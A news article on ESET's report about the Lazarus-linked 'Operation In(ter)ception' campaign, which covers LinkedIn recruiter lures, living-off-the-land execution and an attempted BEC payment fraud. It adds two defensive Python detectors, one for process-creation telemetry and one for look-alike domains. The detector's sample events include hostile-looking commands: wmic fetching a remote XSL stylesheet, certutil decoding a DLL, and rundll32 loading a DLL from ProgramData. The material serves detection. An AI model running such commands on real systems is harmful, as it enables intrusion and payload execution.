Cybersecurity researchers have recently revealed a new, sophisticated cyber-espionage campaign aimed at spying on key employees of aerospace and military organizations in Europe and the Middle East.
According to a report released by the cyber security company ESET, the campaign, named “Operation In(ter)ception”, took place between September and December 2019.
The researchers reveal that the operation’s primary objective was espionage, but in one of the cases the attackers tried to monetize access to a victim’s email account through a business email compromise (BEC) attack.
The financial motive of the attacks, combined with similarities in targeting and development style, has given ESET reason to suspect the Lazarus Group, a notorious hacking organization accused of operating on behalf of the Government of North Korea and of financing the country’s illegal weapons and missile programs.
LinkedIn Social Engineering Tactics
According to ESET, the campaign was targeted and relied on social engineering tricks to attract employees of the chosen firms. The attackers used LinkedIn’s messaging feature and posed as HR managers of renowned companies in the aerospace and defense sector, including Collins Aerospace and General Dynamics.
Once contact with a victim was established, the attackers slipped malicious files into the chat, disguised as information relating to a job offer. A RAR archive purporting to contain salary information for specific positions would typically be sent directly through the chat, or as a OneDrive link in an e-mail from the fake LinkedIn persona. Once downloaded and opened, the files in the archive invoked Windows’ Command Prompt utility to carry out a number of actions, such as:
- Copy the Windows Management Instrumentation Command-line tool (wmic.exe) to a specific folder.
- Rename the WMIC tool into something harmless to avoid detection (for example Intel, NVidia, Skype, OneDrive and Mozilla).
- Create scheduled tasks that execute a remote XSL script via WMIC.
After the initial phase of gaining a foothold inside the targeted company, the actors behind the operation deployed a custom malware downloader that fetched a second-stage payload: a C++ backdoor that periodically sends requests to an attacker-controlled server, performs pre-defined tasks based on the commands it receives, and exfiltrates information from the targeted company. The attackers also abused native Windows utilities: “certutil” to decode base64-encoded payloads, and “rundll32” and “regsvr32” to run their custom malware.
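The steps listed above are all "living off the land" techniques, which makes them a good fit for process-creation telemetry rather than file hashes. The following is an added example (not ESET's code, and not from the report) of a detection pass over constructed process-creation records modelled on the fields Sysmon Event ID 1 logs. It keys on the executable's embedded OriginalFilename so a renamed copy of wmic.exe is still recognised, and flags the remote-XSL, certutil-decode and user-writable-DLL patterns the article describes. All paths, hostnames and field names are assumptions for the sake of the example.

```python
import re
from dataclasses import dataclass

# Constructed, simplified process-creation record. The fields mirror what
# Sysmon Event ID 1 provides, but the names are this example's own.
@dataclass
class ProcessEvent:
    image: str               # full path of the executable that ran
    original_file_name: str  # OriginalFilename from the PE version resource
    command_line: str
    parent_image: str

# Windows utilities the report says were abused. Matching on the PE's
# OriginalFilename rather than the on-disk name survives the renaming step.
LOLBINS = {"wmic.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe"}

# Directories where these binaries legitimately live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# wmic asked to load a stylesheet from a web server (the remote XSL step).
REMOTE_XSL = re.compile(r"/format\s*[:=]\s*\"?https?://", re.IGNORECASE)
# certutil used as a base64 decoder rather than for certificates.
CERTUTIL_DECODE = re.compile(r"-decode(hex)?\b", re.IGNORECASE)
# rundll32/regsvr32 loading a module from a user-writable location.
USER_WRITABLE = re.compile(r"\\(ProgramData|AppData|Temp|Public)\\", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event: ProcessEvent) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings: list[str] = []
    orig = event.original_file_name.lower()
    if orig not in LOLBINS:
        return findings

    on_disk = basename(event.image)
    if on_disk != orig:
        findings.append(f"{orig} renamed to {on_disk}")
    if not event.image.lower().startswith(SYSTEM_DIRS):
        findings.append(f"{orig} running from non-system path {event.image}")

    if orig == "wmic.exe" and REMOTE_XSL.search(event.command_line):
        findings.append("wmic loading a remote XSL stylesheet")
    if orig == "certutil.exe" and CERTUTIL_DECODE.search(event.command_line):
        findings.append("certutil decoding an encoded payload")
    if orig in ("rundll32.exe", "regsvr32.exe") and USER_WRITABLE.search(event.command_line):
        findings.append(f"{orig} loading a module from a user-writable directory")
    return findings


# Constructed sample events; hostnames and paths are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\ProgramData\Intel\Intel.exe", "wmic.exe",
                 r'Intel.exe os get /format:"https://placeholder.invalid/style.xsl"',
                 r"C:\Windows\System32\svchost.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "certutil.exe",
                 r"certutil -decode C:\Users\u\AppData\Local\Temp\offer.txt C:\Users\u\AppData\Local\Temp\offer.dll",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe",
                 "wmic computersystem get model", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", "rundll32.exe",
                 r"rundll32.exe C:\ProgramData\Mozilla\update.dll,Start",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe",
                 "notepad.exe", r"C:\Windows\explorer.exe"),
]


def scan(events) -> dict[str, list[str]]:
    """Map each suspicious image path to its findings, skipping clean events."""
    return {e.image: analyse(e) for e in events if analyse(e)}


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS).items():
        print(image)
        for hit in hits:
            print("   ", hit)
```

The OriginalFilename comparison is the piece that matters most here: a renamed wmic.exe in a vendor-looking folder produces no hash or filename match, but its version resource still says what it is, and its launch by the Task Scheduler service (svchost.exe as parent) rather than an interactive shell is a further point to correlate in a real pipeline.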
In response to the findings, LinkedIn’s Head of Trust and Safety, Paul Rockwell, stated that the company actively looks for signs of state-sponsored activity on the platform and takes rapid action to protect its members against bad actors. He also said that LinkedIn’s threat intelligence team removes fake accounts using information from various sources, including government agencies.
“…the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service,” he added. “In this case, we uncovered instances of abuse that involved the creation of fake accounts. We took immediate action at that time and permanently restricted the accounts.”
Money-extortion BEC attacks
In addition to the scenario described above, ESET researchers found evidence of the attackers trying to profit from the compromised accounts by extracting money from other businesses. Although unsuccessful, there was an attempt to have an unpaid invoice paid to a different bank account, using existing email correspondence between the account holder and a client of the company. According to the researchers, for the purpose of this fraud the attackers registered a domain name identical to the compromised company’s, but under a different top-level domain, and emailed the targeted customer from this look-alike domain. The customer eventually contacted the victim at its legitimate email address about the suspicious message, which thwarted the attacker’s attempt.
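The look-alike domain is what gave the fraud attempt away, and it is also the easiest part to check automatically at the mail gateway or in an accounts-payable workflow. The following is an added example (not ESET's code) that compares a sender's domain against a list of trusted partner domains, flags a sender whose organisation label matches but whose top-level domain differs, and combines that with a simple scan for bank-detail-change wording of the kind the article describes. The trusted domains, sample message and suffix list are all constructed for the example; a production check would consult the Public Suffix List rather than the small table here.

```python
from typing import Iterable, Optional

# Small constructed table of second-level suffixes so "example.co.uk" style
# domains split correctly. Assumption for this example only.
SECOND_LEVEL_SUFFIXES = {"co", "com", "org", "net", "ac", "gov"}

# Wording that commonly accompanies a payment-diversion request.
PAYMENT_CHANGE_TERMS = ("new bank", "updated bank", "bank account",
                        "account details", "remit", "wire")


def split_domain(domain: str) -> tuple[str, str]:
    """Return (organisation label, public suffix) for a domain name."""
    labels = domain.lower().strip(".").split(".")
    if (len(labels) >= 3 and labels[-2] in SECOND_LEVEL_SUFFIXES
            and len(labels[-1]) == 2):
        return labels[-3], ".".join(labels[-2:])
    if len(labels) >= 2:
        return labels[-2], labels[-1]
    return labels[0], ""


def lookalike_of(sender_domain: str, trusted_domains: Iterable[str]) -> Optional[str]:
    """Return the trusted domain the sender imitates, or None if it is genuine
    (or simply unrelated). A subdomain of a trusted domain is treated as genuine."""
    sender = sender_domain.lower()
    s_org, s_suffix = split_domain(sender)
    for trusted in trusted_domains:
        t = trusted.lower()
        if sender == t or sender.endswith("." + t):
            return None
        t_org, t_suffix = split_domain(t)
        if s_org == t_org and s_suffix != t_suffix:
            return t
    return None


def assess(sender: str, subject: str, body: str, trusted_domains: Iterable[str]) -> dict:
    """Score one inbound message for the BEC pattern: look-alike domain plus
    a request to change where money goes."""
    domain = sender.rsplit("@", 1)[-1]
    imitated = lookalike_of(domain, list(trusted_domains))
    text = f"{subject}\n{body}".lower()
    payment_change = any(term in text for term in PAYMENT_CHANGE_TERMS)
    if imitated and payment_change:
        verdict = "hold-and-verify"   # confirm out-of-band with the known contact
    elif imitated or payment_change:
        verdict = "review"
    else:
        verdict = "ok"
    return {"sender_domain": domain, "imitates": imitated,
            "payment_change": payment_change, "verdict": verdict}


# Constructed sample: a supplier we normally pay, and a message from a
# domain that matches it in everything but the TLD.
TRUSTED = ["example-supplier.com"]
SAMPLE_MESSAGE = {
    "sender": "accounts@example-supplier.net",
    "subject": "Invoice 1042 - updated bank details",
    "body": "Please remit payment for the outstanding invoice to our new bank account.",
}

if __name__ == "__main__":
    print(assess(SAMPLE_MESSAGE["sender"], SAMPLE_MESSAGE["subject"],
                 SAMPLE_MESSAGE["body"], TRUSTED))
```

The "hold-and-verify" outcome is deliberately not an automatic block: the right response is exactly what the targeted customer did in the case above, namely confirming the request through the address already on file rather than by replying to the message.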
The researchers concluded that the study of Operation In(ter)ception shows once again how effective spear phishing, in combination with social engineering tactics and multistage malware, can be at compromising a chosen target.